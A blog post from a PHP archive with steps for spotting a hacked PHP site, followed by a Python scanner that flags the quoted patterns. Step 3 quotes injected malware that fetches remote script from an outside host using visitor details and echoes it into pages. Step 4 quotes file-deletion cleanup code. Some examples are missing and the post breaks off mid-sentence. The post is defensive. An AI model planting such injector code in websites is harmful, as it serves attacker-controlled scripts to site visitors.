Archive for the ‘PHP’ Category
Forms of PHP website hacking
If you realize that your PHP website has been hacked, which is most likely the result of trojans on your computer, first scan your computer with an anti-malware tool, then follow these steps:
1.) Verify whether the .htaccess file was modified to allow access to other files containing malicious scripts.
2.) Verify whether there is hard-to-read code in any of your PHP files. For example:
which stands for:
3.) Verify whether a JavaScript that is not yours is included in your files. For example, I found this code in a file:
error_reporting(0);
ini_set('display_errors',0);
$wp_uagent = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Firefox|MSIE/i', $wp_uagent) && preg_match ('/ NT/i', $wp_uagent))){
    if ((!isset($_SERVER['HTTP_X_FORWARDED_FOR'])) && (!isset($_SERVER['HTTP_VIA']))){
        $wp_gturl=$wp_rssh."://".$wp_rssh."s".$wp_gt.".com/".$wp_gt."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_uagent);
        $wp_cntnt = @file_get_contents($wp_gturl);
    }
    if ( substr($wp_cntnt,1,3) === 'scr' ){
        echo $wp_cntnt;
    }
}
which gets the file content from a site, in this case:
http://httpsget.com/get/?ip=YOUR_SITE_IP&referer=YOUR_SITE_DOMAIN&ua=Mozilla%2F5.0+%28Windows+NT+5.1%3B+rv%3A11.0%29+Gecko%2F20100101+Firefox%2F11.0
If the result of the received content starts with
pretty smart
4.) Also found this in another PHP file; not exactly sure, but it is probably a way to delete a file that was used as a back door into your server.
chmod('images/www.imdb.com/',0777);
unlink('images/www.imdb.com/index.php');
rmdir('images/www.imdb.com');
5.) Check for external scripts in your database. If your database was compromised, then you should start looking for included scripts in the fields that store users' posts, and proceed to clean them. These can either be done by adding a script reference such as
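
A triage scanner for the file checks in steps 3 and 4, as an added example that is not part of the original post: it flags PHP files that combine the traits of the two snippets quoted above. The trait names, labels and sample strings are constructed for illustration.

```python
import re
from pathlib import Path

# Traits taken from the two samples quoted in steps 3 and 4 of this post.
TRAITS = {
    "error_suppression": r"error_reporting\s*\(\s*0\s*\)|ini_set\s*\(\s*['\"]display_errors['\"]\s*,\s*['\"]?0",
    "user_agent_read": r"\$_SERVER\s*\[\s*['\"]HTTP_USER_AGENT['\"]\s*\]",
    "proxy_header_check": r"HTTP_X_FORWARDED_FOR|HTTP_VIA",
    "chmod_0777": r"chmod\s*\([^)]*,\s*0?777\s*\)",
    "self_delete": r"\b(?:unlink|rmdir)\s*\(",
}
# A variable assigned from file_get_contents() called on another variable (not a literal).
FETCH = re.compile(r"(\$\w+)\s*=\s*@?\s*file_get_contents\s*\(\s*\$\w+")

# Constructed samples modelled on the snippets above (shortened, no real URL).
SAMPLE_INJECTOR = """<?php error_reporting(0);
$ua = @$_SERVER['HTTP_USER_AGENT'];
if (!isset($_SERVER['HTTP_VIA'])) { $c = @file_get_contents($url); }
if (substr($c,1,3) === 'scr') { echo $c; } ?>"""
SAMPLE_CLEANUP = "<?php chmod('images/x/',0777); unlink('images/x/index.php'); rmdir('images/x'); ?>"
SAMPLE_BENIGN = "<?php $t = file_get_contents('template.html'); echo $t; ?>"

def find_traits(source):
    """Return the set of trait names present in one PHP source string."""
    found = {name for name, rx in TRAITS.items() if re.search(rx, source, re.I)}
    # Follow the data: a variable filled by a remote-capable fetch and later echoed.
    for var in FETCH.findall(source):
        if re.search(r"\b(?:echo|print)\s*\(?\s*" + re.escape(var) + r"\b", source):
            found.add("fetched_content_echoed")
    return found

def classify(source):
    """Map trait combinations to a triage label; None means no combination matched."""
    t = find_traits(source)
    if "fetched_content_echoed" in t and t & {"user_agent_read", "proxy_header_check", "error_suppression"}:
        return "remote-script-injector"
    if {"chmod_0777", "self_delete"} <= t:
        return "cleanup-stub"
    return None

def scan_tree(root):
    """Classify every *.php file under root; returns {path: label} for hits only."""
    hits = {}
    for path in Path(root).rglob("*.php"):
        label = classify(path.read_text(errors="replace"))
        if label:
            hits[str(path)] = label
    return hits
```

A single trait on its own (for example `error_reporting(0)`) is deliberately not reported; only the combinations seen in the samples are, and each hit still needs manual review.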